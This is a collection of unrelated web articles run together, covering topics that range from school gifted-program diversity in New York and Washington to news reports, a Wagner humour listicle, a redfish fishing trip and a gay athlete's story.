GOP nominee Donald Trump is hoping his opponent Hillary Clinton has a nice rest during her days off . On Tuesday , the Republican presidential candidate mocked Clinton 's six-day break via Twitter , saying “ she needs the rest. ” Hillary Clinton is taking the day off again , she needs the rest . Sleep well Hillary – see you at the debate ! — Donald J. Trump ( @ realDonaldTrump ) September 20 , 2016 Trump 's comments come as Hillary 's campaign schedule appeared bizarrely Hillary-less for the next six days with less than 50 days to go before the election . Hillary was set to return to the campaign trail next Monday at the first presidential debate , according to TheAmericanMirror.com , however her schedule was updated to add a campaign stop in Orlando , Florida on Wednesday , September 21 .
Read the rest here .
Families from across New York City flock to Brooklyn School of Inquiry in Gravesend — the kind of school where parents raise enough money to pay for extra helpers in most classrooms and a multi-million dollar STEM lab is being built on the roof .
But for all the gifted and talented school offers , Principal Donna Taylor says there is one thing lacking : a student body that reflects the diversity of the city .
Taylor hopes to make a dent in that . Starting next fall , BSI will become the first citywide gifted and talented school to experiment with new admissions policies to promote integration . The Department of Education has allowed the highly sought-after school to set aside 40 percent of its kindergarten seats specifically for low-income children .
“ I think that was just what we needed , ” Taylor said .
In joining the city 's “ Diversity in Admissions ” program , Taylor is trying to address striking differences between her school and others . Citywide , about 77 percent of students are poor and almost 70 percent are black or Hispanic . Last year , BSI 's poverty rate was 23 percent , and less than 10 percent of students were black or Hispanic .
The disparity is not unique to BSI , or to gifted education . Citywide , about 73 percent of gifted students are white or Asian , and the poverty rate averages around 43 percent .
There are almost no students who are learning English , have special needs or are in temporary housing in the city 's gifted programs . Put together , they make up less than 10 percent .
Chalkbeat New York Stay on top of New York education news with our morning newsletter . Subscribe “ I did n't even know what I was missing , but as soon as Chalkbeat 's info started rolling in , it was like a part of my brain just started lighting up . You need what they have to offer. ” — Tim L .
“ What we have right now is something we should be ashamed of , ” said James Borland , who directs gifted education programs at Teachers College Columbia University .
While most gifted programs are housed within traditional schools , BSI is one of five citywide schools that enroll gifted children exclusively . The citywide schools are some of the hardest to get into , essentially requiring four-year-olds to land a near-perfect score on the standardized test used to determine who is “ gifted . ”
Districts used to be able to set their own admissions criteria for gifted programs . That changed in 2007 , when the city standardized entry based on test scores , in part to increase diversity . A non-verbal test , also intended to address inequities , was added in 2012 . Yet today 's gifted programs remain segregated .
That is n't surprising since test scores are closely linked to socioeconomic status , said Allison Roda , who spent years studying New York City 's system and wrote a book titled “ Inequality in Gifted and Talented Programs . ”
“ You 're never going to integrate gifted and talented classrooms that way , ” she said .
The current administration has tried its own methods to diversify gifted education . Perhaps the most sweeping effort was the launch of new gifted programs in four districts in Brooklyn and the Bronx that had gone years without . Those programs started this year , admitting third-grade students rather than kindergartners and using measures other than the traditional gifted tests to decide admission , including grades and teacher recommendations . Both moves could level the playing field by making it less likely that students test into gifted programs based on the advantages they bring from home .
In those new programs , 70 percent of students are low-income , 49 percent are black and 39 percent are Hispanic , according to the Department of Education .
Officials recently announced the more expansive third-grade admissions criteria would apply to another school : P.S . 191 on the Upper West Side , which has been embroiled in a long-standing rezoning debate .
Students at P.S . 191 are largely black , Hispanic and poor — and gifted programs are often seen as a way to help integrate schools . Roda criticized that approach , saying gifted programs just lead to segregation within school buildings .
“ It is a way to attract white , higher-income families to a school . But once you do that , it 's like gentrifying a school , ” she said . “ You walk down the hallway , and you can tell which classroom is gifted and talented and which classroom is general education . ”
The Department of Education did not make anyone available for comment on gifted education issues , despite repeated requests . In an email , a spokesman wrote : “ We 're committed to increasing diversity and expanding high-quality elementary education for students and families – including through Gifted & Talented programming . ”
Recent efforts , however , appear to have fallen short . According to city data , recorded in annual school diversity reports , the percentage of black and Hispanic and low-income students enrolled in gifted education has remained about the same over the last two years .
Borland said the city could instead move back toward allowing districts more flexibility in how they decide who 's “ gifted. ” Instead of one test cut-off score , students would be admitted based on how they compared to their local peers .
“ That makes sense because you need a different program based on how you compare to kids in your class , ” and not , for example , students in another borough , Borland said .
But ultimately , he said , “ I would not base admissions on tests . ”
The new enrollment policy at BSI is likely to have a small effect — one that could take years to play out . Because siblings of current students get priority in enrollment , precious few kindergarten seats are open in any given year . And even if BSI meets its enrollment target of 40 percent low-income , it would still be far below the city average for student poverty .
But Taylor says the school has to start somewhere . She admits some parents have questioned whether the initiative would impact performance .
Her response : “ Sometimes the parents do n't have time to advocate for their kids , but that does n't mean their kids ca n't do as well . ”
Other parents have welcomed the change , and started an information campaign to encourage more families in the community to sign their children up for testing .
“ This is a big deal , ” said Sara Mogulescu , the parent of two students at BSI . “ It 's important to a number of us . ”
Students arriving at school Photo by John Moore/Getty Images
Starting in second grade , I took a school bus from my middle-class neighborhood to downtown Louisville , Ky. , where my grade school was surrounded by public housing projects , as part of an effort to desegregate schools . The year I started there , I was identified as “ gifted ” and put in a separate , accelerated class , where my classmates were mostly other white boys and girls from the suburbs .
In 1975 , the school system in Louisville had launched the district-wide “ Advance Program , ” which offered an enriched curriculum , just as the desegregation plan went into effect . All Louisville schools were required to have a mix of black and white students so that the number of black students never fell below or rose above a certain cutoff . ( It varied over the years , but the range was around 20 to 40 percent . ) In the Advance Program , however , the rules did n't apply because classroom assignments within schools were exempt . The percentage of black students in the gifted program was 11 percent .
I had the choice to leave the school in fourth grade , as did my suburban peers , but most of us stayed at our inner city school because our parents liked the program so much . From second grade until my senior year in high school , my classes never had more than two black students at a time .
I would like to think that I 'm smart , but it 's also clear that economic privilege and racial prejudice had as much—if not more—to do with admission to the Advance Program as intelligence . In the course of a lawsuit brought by black families against the school district in the 1990s , the school district was required to produce data from the program . The numbers showed that black students in Louisville who took the Advance Program admission test were much less likely to be recommended to join the program than white children , even if they scored in the top percentile . In fact , more than two-thirds of black middle- and high-school students who did well on the tests were denied entrance to the program by the teachers and counselors who made the final determinations , while only a third of white kids were rejected .
Gifted and talented programs have been the target of criticism ever since the concept took hold in the 1970s as huge demographic changes were transforming urban school districts . White , middle-class families were fleeing to the suburbs . Like magnet schools , accelerated programs for gifted students were attractive to many of these families and provided a way to counteract this flight and maintain diversity in city school systems . The problem was that gifted programs tended to foster racial separation inside schools , undermining the very goal they were supposed to support .
Today , gifted programs still tend to separate students by race . New York City is a case in point . There , the education department has been struggling for years to change the demographic makeup of its gifted program—which is disproportionately white and Asian—and spread access to a more representative group of students . There are a handful of open-enrollment gifted schools in the city , but the district 's efforts at increasing diversity in the bulk of gifted and talented classrooms have largely backfired .
In 2006 , a quarter of students in New York City gifted classrooms were white , although white students made up only 15 percent of the student population . The district attempted to level the playing field by eliminating a subjective system in which teachers and preschools played a major role in deciding which students were identified as gifted . From then on , students across the city would have to take the same two tests . Decisions about who made it in would be centralized . The hope was that using more objective measures would expand access and prevent in-the-know parents from gaming the system .
But relying on tests produced the opposite effect . Middle-class parents frantically prepped their 4-year-olds for testing . This year , 70 percent of students identified as gifted in the city are white or Asian , up from 68 percent last year , while just over a quarter are black or Hispanic .
In 2006 , before it changed the admissions system , New York City opened 15 new gifted and talented programs to serve more minority children , bringing the number of schools with the programs to more than 200 , according to officials at the time . By 2009 , many of those programs had been shuttered . There were only about 140 schools with gifted classrooms that year . This year , there are just 88 . The neighborhoods that lost gifted and talented programs tended to be those with high concentrations of blacks and Hispanics : Bedford-Stuyvesant , East New York , Flatbush , Washington Heights .
Asked about the changes , department officials said they have actually increased the number of gifted and talented seats in recent years to meet growing demand . Given the decrease in the number of schools offering the program and the declining percentage of minorities in the program , it follows that the new seats are probably concentrated in just a few schools , many of them in affluent areas . So the question is , should they keep expanding the program ? As a recent New York Times article noted , “ The accelerated classrooms serve as pipelines to the city 's highest-achievement middle schools and high schools , creating a cycle in which students who start out ahead get even further advantages from the city 's schools. ” In the D.C. suburbs and other places , gifted and talented programs have the same dynamic .
Proponents of gifted education argue vigorously against doing away with it entirely . “ There 's nothing worse than having a bright , talented child just sitting , ” says Joan Franklin Smutny , director of the Center for Gifted , a nonprofit based in a Chicago suburb . “ They need to be challenged . They need to be inspired . ”
Joseph Renzulli , director of the National Research Center on the Gifted and Talented at University of Connecticut , agrees with Smutny : “ The biggest problem with bright kids in urban schools , besides being picked on , is they are dying from boredom . The longer they stay in school , the lower their scores become . ”
Supporting their argument is a 2011 study of high-achieving children by the Thomas B. Fordham Institute , a conservative think tank . It found that many such students lose ground over time , prompting the researchers to worry that “ closing achievement gaps and ‘ leaving no child behind ' [ are ] coming at the expense of our ‘ talented tenth'—and America 's future international competitiveness . ”
The racial disparities are “ a great shame , of course , ” wrote Chester Finn , the president of Fordham , in a recent blog post , “ but it 's not exactly a surprise that more affluent kids are likelier to end up in gifted programs . Their families do n't face the stress of poverty , and they tend to have two parents who read to their children , send them to preschool , etc . ”
Determining whether a child is actually more intelligent than her peers or whether she 's just the product of more affluent , ambitious parents is a difficult task for school systems interested in breaking the cycle of privilege that gifted education tends to fuel . Experts caution against relying heavily on tests , as New York does , but there are no national or even state standards defining giftedness , according to the National Society for the Gifted and Talented , an advocacy group .
The society suggests that parents and teachers check a list of traits , including whether children are “ perfectionist and idealistic , ” “ asynchronous , ” or “ problem solvers. ” Smutny says teachers should be trained to look for a different set of characteristics , such as creativity , well-developed imaginations , and curiosity , which she says are correlated with above-average intelligence . They must also be trained to “ cut through ” stereotypes , she says , so that talented children who are also poor or from a racial minority are not overlooked .
Is there a better way to provide education for gifted children without exacerbating racial inequities ? Officials in the Washington , D.C. , public schools believe they 've found a possible answer . This year , for the first time in more than a decade , the D.C. schools have reintroduced gifted education . The decision comes as many city neighborhoods are experiencing a surge of new middle-class , white families , and one reason for the reintroduction of gifted classes is to entice more of them to choose public , not private , schools . The district opened one gifted program in a middle school near the affluent blocks around Georgetown University .
But it also opened one at Kelly Miller Middle School in Ward 7 , a majority low-income , black-student-attended school , and at West Education Campus , in the 16th Street Heights neighborhood , where there is a small but growing population of Hispanic immigrants mixing with the predominantly black population .
Unlike traditional gifted programs , which usually require a test to get in , the D.C. programs are open to any student who wants to enroll . D.C. is aiming the program both at students who are book smart and those who may struggle on traditional measures of achievement but have other extraordinary talents that are harder to measure with a test . The plan is to “ build up the gifts they have rather than just focus on their weaknesses , ” said Mathew Reif , the district 's director of advanced and enriched instruction .
The principal at Kelly Miller , Abdullah Zaki , explains that the idea is to expand the concept of giftedness . “ If there 's a kid who is not reading at grade level but has the gift of gab and can argue you down in a heartbeat , they 're obviously interested in debate , ” he says . “ We can take their natural gift and talent and hone and polish it. ” Working on the skill the student enjoys and is good at might improve other skills that do n't come as naturally—such as analysis or reading of complex texts , Zaki says .
The open-door policy D.C. has embraced may offer a way around the dilemma of identifying gifted children . “ The bias should be to let students who want to try these classes try them , ” says Gary Orfield , a political scientist at UCLA who has advocated for more racial integration in schools . “ There should be a very explicit commitment to race and class diversity and targeted recruitment to make it happen . ”
But simply allowing all comers to participate in gifted education does n't erase its problems . When Kelly Miller launched its gifted program last fall , principal Abdullah Zaki says he “ thought it would be a big clamor throughout our community—parents rushing to get their kids into our building . That did n't happen the way I wanted . ”
Convincing the black families in Kelly Miller 's neighborhood to enroll their children has been a challenge , partly because for many the term “ gifted and talented ” was a foreign concept , Zaki says . He 's taken to using synonyms like “ honors ” to persuade parents to take an interest , even if it does n't quite capture what the school is trying to offer students .
In addition , placing students with a wide range of abilities together is a difficult undertaking for teachers . It takes tremendous skill to create lesson plans that will challenge high-achieving students while not leaving others behind—one reason gifted programs were created in the first place . D.C. has hired three specialized teachers to lead the gifted curriculum at each of the middle schools with the program . They spend time each week with small groups of students working on projects tailored to the group 's talents and interests . But the specialized teachers ' time is divided among all of the classrooms in the school . And Kelly Miller is also offering a more traditional version of gifted education , with a track of accelerated math and literacy courses for students who score well in those subjects .
The “ schoolwide enrichment model , ” as it 's known , has had some success elsewhere , but there 's no data yet to show how the schools are doing . D.C. officials say they 're watching the experiment closely and will look at test scores and teacher , parent , and student responses , and other measures at the end of the year .
The D.C. model may end up being a watered-down version of gifted and talented education that ca n't match the more exclusive programs found in New York and other places . But it 's also much fairer , and it may also be a more effective way to reach the students with innate talent . The Fordham study 's other major finding was that a large number of children are “ late bloomers , ” whose abilities appear only later in their school careers . At Kelly Miller , Zaki says the whole point is to identify these students—the ones with potential and talent who have so far been overlooked , possibly because of their race or class . “ That 's the excellent thing about it , ” he said . “ These kids exist . ”
This story was produced by The Hechinger Report , a nonprofit , nonpartisan education news outlet based at Teachers College , Columbia University .
A neckbeard , in literal terms , is hair covering the neck but not the face ( see above ) . However , the term is often used to describe the kind of person who chooses to sport such a facial abomination . Neckbeards are self-satisfied nerds who wear fedoras and read the novels of Orson Scott Card . They can usually be found on message boards , complaining about immigration and “ misandry ” . Many people think that the Neckbeard phenomenon is a fairly recent one , perhaps dating back to no earlier than the invention of modem . However , I have discovered a much earlier specimen : Richard Wagner , the subject of the above painting .
Below are six reasons why Wagner was the original Neckbeard…
1 ) He loved mythology
Wagner 's Ring Cycle is said to have been a huge influence on J.R.R . Tolkien , author of the Neckbeard 's favourite book , Lord of the Rings . Both works feature the fight for a ring of power that corrupts those who use it . This was n't Wagner 's only brush with mythology ; Wagner 's first opera Die Feen has shades of Arwen and Aragorn , it being the story of a woman from the fairy world who marries a mortal king .
2 ) He had a high opinion of himself
Okay , I suppose this one goes without saying . Anybody who writes a fifteen-hour-long opera cycle could hardly be called unpretentious . He believed that his works were so superior that they were a whole new form of expression , which referred to as “ complete works of art ” . This egomania led to a sense of entitlement : “ The world owes me a living , ” he claimed . And when he misbehaved ( which did often ) , he did n't believe he could be judged by the same standards of everybody else , because he was an artist .
3 ) He had terrible fashion sense
It was n't just the beard ; Wagner spent a fortune on terrible clothes . He wore satin jackets , fur-lined silk slippers , and Russian-leather booties . He also wore this hat , which is basically the 19th century equivalent of the fedora…
5 ) He had a horrible attitude towards women
Wagner might have had more success with the ladies than most modern Neckbeards , but it was n't because he treated women with any respect . His biography is full of women that he wooed and then soon discarded . He found himself a patron called Otto Wesendonck , who built a house especially for Wagner . He repaid this favour by having an affair with Wesendonck 's wife , right under his own wife 's nose . Pretty soon , he turned his back on both these women and was chasing someone else .
4 ) He was a creep
It was n't just Wesendonck that Wagner used for his own ends ; he was forever schmoozing rich people that could help his career and pay off his debts . Early in his career , whilst in Paris , he tried to ingratiate himself with the successful Jewish composer Giacomo Meyerbeer . He addressed letters to him as “ Master ” and signed them “ Your slave ” . Meyerbeer used his influence to help bring the younger composer 's operas to the stage . However , Wagner would later turn against Meyerbeer in the worst possible way…
6 ) He was incredibly bigoted
These days , Wagner is as famous for his anti-Semitism as for his music . He wrote an essay called Jewishness in Music , in which he argued that no Jewish person could write a true piece of music because they had no link to the spirit of the German people . He later called out Giacomo Meyerbeer by name , calling him “ a Jew banker who happened to write music ” . Yikes !
Advertisements
KABUL ( Reuters ) - At least six prisoners of the Taliban as well as a Taliban commander died following a U.S. air strike in Afghanistan at the weekend , according to conflicting reports which U.S. officials said they were investigating .
A Defense Department official in Washington confirmed an air strike was launched against the Taliban on Saturday . The official said on Monday reports that civilians had been killed in the attack were being investigated .
Details of the incident , near the northern city of Kunduz on Saturday , remain unclear . It follows a decision by President Barack Obama to authorise greater use of U.S. combat power against the Taliban .
Sher Aziz Kamawal , a senior police commander in northeast Afghanistan , said Janat Gul Osmani , a senior Taliban commander responsible for a series of kidnappings , was killed along with five other militants when his car was hit by an air strike in the Chardara district of Kunduz .
In retaliation , he said on Monday , the Taliban killed six civilian prisoners by blowing them up .
Taliban spokesman Zabihullah Mujahid confirmed that Mullah Janat and four fighters had been killed in the air strike , which he said also killed six captured Afghan soldiers the Taliban was holding . He denied the Taliban had killed the captives itself .
“ Our enemy later on spread rumours that the Mujahideen blew up and killed the prisoners which we strongly reject , ” he said in a statement .
The incident comes amid a spate of kidnappings around Kunduz , with at least 200 people abducted by the Taliban on the roads near the city .
Last year , a U.S. air strike on a hospital in Kunduz run by aid group Medecins Sans Frontieres killed 42 people , in an incident an official U.S. report said was caused by a mixture of human and technical errors .
How to Sleep in a Tesla Model S or Model X
August 13th , 2017 by Matt Pressman
A few years ago , we had the good fortune of meeting Steve Sasman , the “ proprietor ” of the Tesla Hotel . According to Steve , “ One of the many benefits of the highly versatile Tesla Model S sports car is the plentiful amount of room for one or two people to sleep in the back with the seats folded down . Outfitted with a comfy 8″ thick air mattress , you will sleep like a baby who just struck the technology jackpot . ”
Above : Sasman 's Model S transformed into a Tesla Hotel ( Image via Tesla Renter )
Sasman explains , “ Imagine sleeping in climate controlled comfort all night by running the A/C or Heat – while barely even taxing the battery . Set the evening mood with your favorite music on the Tesla 's amazing 17″ built in control monitor , and use the remote controlled candles powered by … you guessed it – batteries , because it 's a Tesla of course … you can dream about owning a Tesla while actually sleeping in one . ”
Above : Sasman 's remote control candles add trunk ambiance ( Image via Tesla Renter )
And it 's not just Steve . Bloomberg did an entire piece on the joys of camping ( and sleeping ) in a Tesla Model S. Writer Tom Randall explains , “ One beauty of the Model S for camping is that the back seats fold flat , creating an impressive expanse that can accommodate someone more than six feet tall … [ so ] I stretched out on my Tesla bed and realized for the first time that I was in a room of windows , with a panoramic view of the mountains and trees and the stars beyond . ”
Above : Bloomberg writer Tom Randall goes camping and preps the bed for a good night of Tesla sleep ( Image via Bloomberg )
Although the Model S is known for it 's unique ability to provide a great night of sleep , Tesla 's Model X is also plenty capable . Norwegian Tesla enthusiast Bjørn Nyland shows that the Model X makes a great hotel as well . One of his many informative tips includes the use of sunshades . He used them to darken , insulate , and add some much-needed privacy to the cabin .
Above : Nyland shows you his recommended technique for sleeping in a Tesla Model X ( YouTube : Bjørn Nyland )
In any event , be sure to watch all of Bjørn 's excellent tips in order to get a good night 's sleep in your Tesla . Then , next time you 're on the road , save a few bucks , cuddle up in your Tesla , and enjoy some zzz 's in your own electric hotel . And perhaps sometime in the not-so-distant future , you can live the Elon Musk dream of travel ( and sleep ) in the ultra-cool Hyperloop Hotel .
Source : Bjørn Nyland
Eight PKK militants killed in southeast Turkey
ANKARA
DHA Photo
Eight members of the outlawed Kurdistan Workers ' Party ( PKK ) have been killed in fighting with security forces in the southeastern town of Cizre , as the army launched major operations backed by curfews against urban-based PKK militants.The clashes in Cizre , in the southeastern province of Şırnak resulted in “ eight separatist terror organization members ” being killed , the Turkish General Staff said in a written statement on its website on Dec. 16.Eight militants were “ neutralized ” after they opened fire on soldiers during operations in Cizre and Silvan , close to the Syrian border , on Dec. 15 , said the statement.Open-ended curfews have been declared in both Cizre and Silvan , the latest in a succession of such measures across southeastern Turkey.Meanwhile , seven militants surrendered in the nearby Silopi district , which was also the site of fierce clashes . In the Suruç district of the southeastern province of Şanlıurfa , two PKK militants surrendered to security forces.In the meantime , police officer Mustafa Nohut , 47 , who was killed in a PKK attack in Diyarbakır on Dec. 15 , was laid to rest in the western province of Kırıkkale on Dec. 16 . Another police officer Nuri Yazanel , who was killed in the same attack , was laid to rest in Kayseri on Dec. 16 . Police Chief Ahmet Kabukçu , killed in the same attack , was laid to rest in Ankara after a ceremony at the central Kocatepe Mosque .
CITY OF NEWBURGH - Diana King , a lifelong Newburgh resident and 1993 Newburgh Free Academy graduate , just could n't bear it when she saw homeless people panhandling on Broadway .
“ It hurt my heart , ” she said .
She vowed that if she ever came into some money , she 'd do something about it . Then , about a week ago , King made up her mind to hand out food , money or not .
So this past Monday , she started her project to help the homeless . She put out the word on Facebook . The owner of the Imperial Hotel at 316 Broadway said she could use the space in front of the hotel . Local eateries quickly stepped up to donate food .
“ They were great when I told them what I was doing , ” King said .
With the pledges rolling in , she signed up her daughter , Marissa , and six friends to help organize the event . They handed out fliers , up and down Broadway .
About 20 people were lined up when the giveaway on Broadway began at 2 p.m. Saturday . King and her helpers were ready with stacks of boxes of pizza , plus chicken , watermelon , doughnuts , soda and bottled water .
For Raymond Dias , who spent six years homeless in Paterson , N.J. , then made his way to Newburgh , the food made a big difference . The churches that distribute free food in Newburgh schedule fewer meals on weekends . “ This was a nice , early supper , ” Dias said as he munched on pizza and watermelon .
Aspacio Alcantara , who said his home is “ the Earth , ” and has been living on the streets in Newburgh for “ a year and a day , ” said the giveaway came at just the right time . “ We need more of this , ” Alcantara said .
Folks were n't just getting free food . Planned Parenthood volunteers handed out about 75 condoms , a health insurance representative from a Poughkeepsie firm talked to passers-by about affordable health insurance , and Farrah Brooks , who collects clothing for donation , set up a table . “ It 's a one-stop center for free , ” Brooks said .
More donations kept coming in Saturday . Howard Johnson of Middletown had taken the bus over to meet his daughter . When he saw the crowd , he stopped by , found out what it was all about , and contributed $ 20 worth of food . Johnson said it was divine intervention that put him there .
“ This is what God wants us to do , help people , ” he said .
When it was all over , King said , about 100 people had stopped by , and her group had distributed 102 boxes of pizza , 30 pieces of chicken , 150 doughnuts , and a lot more . She said she might organize another giveaway just before back-to-school time .
“ This is n't the end of me , ” she said as she opened another box of pizza .
dbayne @ th-record.com
San Francisco 's Planning Commission has approved the plans for a 220-foot building to rise at 75 Howard Street , with 133 market rate condos over a restaurant , café and underground ‘ parking vault ' for 100 cars .
While reduced in height to fit within the principal zoning for the site , which allows for development up to 200-feet in height with the potential for another 20 feet depending upon the building 's design , the Commission granted an exception from the City 's Planning Code to allow for the full 220-feet , which could provide fodder for opponents of the project who had organized to “ Save Rincon Park ” ( and their views ) .
Regardless , the Commission 's approval for 75 Howard sets the stage for an epic battle brewing over the proposed twisty tower to rise up to 400-feet at 160 Folsom and a threatened ballot initiative ( or two ) .
5.14 represents the pinnacle of our sport . Sure , there 's 5.15 and someday there will probably be 5.16 , but 5.14 separates the good from the great . It 's the grade that puts you in the top 1 % of climbers . You ca n't just be-tall your way past cruxes at this level . You need to have flawless technique , and you need to be really , really f * * * ing strong , physically and mentally . Few ever achieve it . In fact , according to our reader survey ( Climbing No . 331 ) , the majority of climbers believe 5.12 will be the hardest they 'll climb in their lifetime . But loftier grades are certainly possible with enough time and dedication . So why are n't you climbing 5.14 ? Note to boulderers : Replace all instances of “ 5. ” with the letter V .
Click the image below to view full size
The Tiger 131 is as close as it gets to an authentic Tiger : Armed with the iconic 88mm L/56 gun and camouflaged in authentic WWII colors and decals . If you 're unfamiliar with Tiger game play , it 's simple : sit back and snipe the enemies that enter your crosshairs .
Note : the penetration value for all ammo types on the Tiger 131 's gun has increased since the first announcement .
The Tiger made mincemeat out of T-34s and Shermans , except for one . The Sherman Fury outmaneuvered the Tiger in the movie `` Fury `` ( 2014 ) . Finally available again on Xbox and for the first time on PS4 , add this Premium flanker to your ranks .
Fury ©2016 Columbia Pictures Industries , Inc. All rights reserved .
The Tiger 131 's Gustav Von Vaerst comes with the `` Deadeye '' Perk . Fury 's Wardaddy has the `` Mentor '' Skill .
Deadeye : 3 % increase to critical damage to enemy modules and Crew . Effective only with AP , APCR , and HEAT rounds .
Effective only with AP , APCR , and HEAT rounds . Mentor : 10 % Crew XP Bonus when fully trained . 10 % Crew XP Bonus when fully trained .
Store Bundles
All Premium vehicles purchased from the Store include a mix of standard and Premium ammo . Ace Operation must be completed within seven days of the bundle purchase date .
Get the biggest Sport stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
DEREK McINNES has told Rangers that Aberdeen will still be Celtic 's main competitors for the Premiership title next season .
McInnes ' men have taken the title race to the closing stages of the season and are on course to break their record points tally of 75 points .
The Dons boss insists his players deserve more credit for the fight they put up this season and is unhappy at talk Rangers will automatically replace his side at the top end of the Premiership next season after their Championship win .
Shay Logan made similar comments last week that riled Mark Warburton , but McInnes agrees with his defender .
He told the Evening Express : “ Next season the focus will go on to Rangers and Celtic and little Aberdeen will be pushed aside .
“ All the experts will tell you that Rangers need to spend millions to give themselves a chance to compete with Celtic .
“ That may well be the case but Rangers ' budget is still three times my budget currently .
“ Yet it seems as if there has been criticism of my team when we do n't sustain a challenge . There is no logic in that .
( Image : SNS Group )
“ While I do n't think we deserve excessive praise , I do n't think my team deserve criticism either . My players always give everything .
“ I think at times they have actually really over performed this season .
“ It 's sometimes too easy to slap the team down for not being able to make a better challenge to Celtic .
“ But we are the only team who have given them a challenge of some sort . We will be aiming to do that again next season , too . ”
I owe you folks an apology . I 've been so caught up in the happenings of the past few weeks that I 've completely neglected knocking out this trip report from the Big Easy . I 've told and retold the stories to friends and family countless times , so it 's time to share with the rest of you .
With that said , I 'd been looking forward to this trip for quite some time . I 'm originally from southwest Louisiana , so that automatically means I 'm Cajun , except for the people that know better Honestly , my hometown is about 20 minutes from the Texas border , so I 'm closer to Texan than Cajun , but I always crack a smile when I mention where I 'm from and people jump to that conclusion .
Regardless of the exact logistics , a return to The Motherland was originally planned by my wife and I as a one-year anniversary trip , but due to a change in job , she was n't able to make it this go-around . I decided to make the best of it , and planned to drive over and spend some time with my little brother , who 's currently a junior in the architecture program over at LSU .
I drove the 9 hours or so east on I10 , which happens to be one of my favorite drives in the country . Once you get right east of Lafayette or so , you end up over the Atchafalaya Basin , which is the largest swamp in the country .
Plus , you get to drive over places with cool names .
Little bro and I arrived in town right smack during rush hour , which was surprisingly tame compared to local traffic here in Austin . We checked in to our room , headed out for some fresh seafood , and called it an early evening , as we both knew what awaited us the next day .
Our guide , Captain Greg Dini , picked us up before daybreak the next morning . Captain Greg is considered to be one of the best redfish guides in the area , and has been getting some great exposure recently with some of the filmwork he 's done . You may have seen his video Riding High from the Drake 5 Minute Films back at IFTD in August . He was a fantastic guide , and we really enjoyed spending the day with him out in the Venice Marsh .
This was Kyle and I 's first time fishing out of a skiff , so we only had a vague idea of what to expect . What I personally did n't expect is how fast things happened . As soon as we poled into the first area , we had two 30+ pound fish cruising right at us on top . By the time I picked my jaw up off the casting platform , those jokers were well out of casting range .
Now , the weather was supposed to be ideal . Supposed to be , being the key phrase there . The forecast called for mostly sunny skies , but it ended up being overcast for the majority of the day with a pretty stout wind . This made it really tough to spot fish , even in the crystal clear 4′ of water they were in . We spooked a ton of fish with the boat that we just could n't see until it was too late .
Finally , after a few unproductive hours , we were cutting through cane-surrounded inlet , and I spotted a fish right in front of the boat .
Showtime .
I do n't remember casting . I do n't remember setting the hook . All I remember is my reel screaming like a stuck pig as the beast of a fish cut right through the cane into the open water beyond .
“ You probably should n't let him get in the cane , ” my brother advised .
Probably not .
Thankfully , I was able to get my line untangled from the cane as Greg poled us back out into the open water . I was halfway into my backing at this point , as Mr. Redfish headed out towards the horizon . As I finally was able to put the rod to him , I realized this was the first time ever I felt under gunned gear-wise . Luckily , the whoopin ' stick held out , even though I was sure it was going to break .
After an epic battle that left my little girl arms convulsing , I finally had my first redfish . And oh what a redfish she was !
I love the spots on these fish . Each fish is different and unique in the way they 're spotted . I think that 's really cool .
After a bit of celebration , it was Kyle 's turn on the casting deck , and it was n't long before he got his first as well .
We continued to swap back and forth , each catching a few more fish . I lost another bruiser right at the boat , and had another “ small ” 8-lber , while Kyle ended up a with a couple more as well . The conditions made it tough , and my casting certainly was n't up to snuff , but we 'd get a few shots every time the sun would peak out from the clouds for a few seconds .
I 'm pretty sure the last fish of the day will be something that will live on in my head forever . Coming around a corner , Greg spotted a nice fish a way out . I made a terrible cast that was short by quite a few feet . I was about to pick up and recast , when the fish barreled over so fast , it pushed a rooster-tail wake of water out behind it . It crushed my fly , and took off . It was like being hooked to a battleship , but after another tough fight , we got her in as well .
We called it a day on that note . It was around 4:30 , and we had a decent ride back to the dock , and all wanted to make it back to town before the big LSU-Bama game that night .
Honestly , this trip lived up to all of my expectations . It was great to get to spend some time with my brother out in the marsh . Captain Dini was a great guide , and while very patient with our casting , was always eager to have a bit of fun with us when we blew a shot completely .
Pretty sure I 'm ruined now . Trout be damned ; I ca n't wait to get back to the salt .
Advertisements
“ For as long as I can remember , I have known that I am gay . I did n't accept it until my late teens and for a long time I would punish myself for certain thoughts in an attempt to condition myself out of my ‘ gayness ' . `` Things became increasingly difficult for me because I knew I was gay , and after various ridiculous attempts to change this - it was n't going away . At the same time I was passionate about excelling in my sport . The two stereotypes of 'gay ' and ‘ professional athlete ' caused me a lot of internal conflict. ” When I think about the stigma reserved for the gay community , it is easy to understand why John struggled as much as he did . Gay people are n't simply different , they are different in a way that makes them less moral . And what 's more , they made the `` lifestyle choice '' to be this way , have n't you heard ? When a culture relentlessly reinforces a particular narrative it becomes increasingly difficult to challenge it . And professional sport is often a deeply homophobic environment . Words such as “ faggot ” and “ homo ” are not accepted in most workplaces , but in the testosterone-driven world of men 's sport , they remain commonplace .
John continued : “ Aged 18 I became involved in a professional sport . This was my dream come true , and nothing was going to stop me making the most of the opportunity . I deliberated at length at the time and decided that to achieve my goals it was important to be judged for what I did , and not what I was . So I decided to keep being gay a secret . This decision turned into a slow , self-imposed torture . `` I have spent my life terrified that ‘ coming out ' to my friends would break their trust . I worry that they will think I 'm a fraud for lying to them for so long . And I could n't live knowing that the people closest to me did n't think I was a genuine person . The people who know me think I 'm a truthful and honest individual . This is important to me and it 's a conflict I am still dealing with. ” Suffering of this kind is desperately sad , and a reminder that while attitudes towards homosexuality are improving , many gay people remain deeply affected by societies that define them by their sexuality . John : “ I did n't tell anyone that I was gay until my mid-20s - not my family , not my friends , absolutely no one . I eventually came out to some people close to me who I trust . This decision made itself , in that I hit rock bottom in the weeks leading up to my decision to talk . I was a wreck . I would spend most of my personal time in tears , my thoughts were becoming dangerous to my well-being and I knew if I did n't speak up my life was at risk. ” I asked John his opinion about how sport can address homophobia .
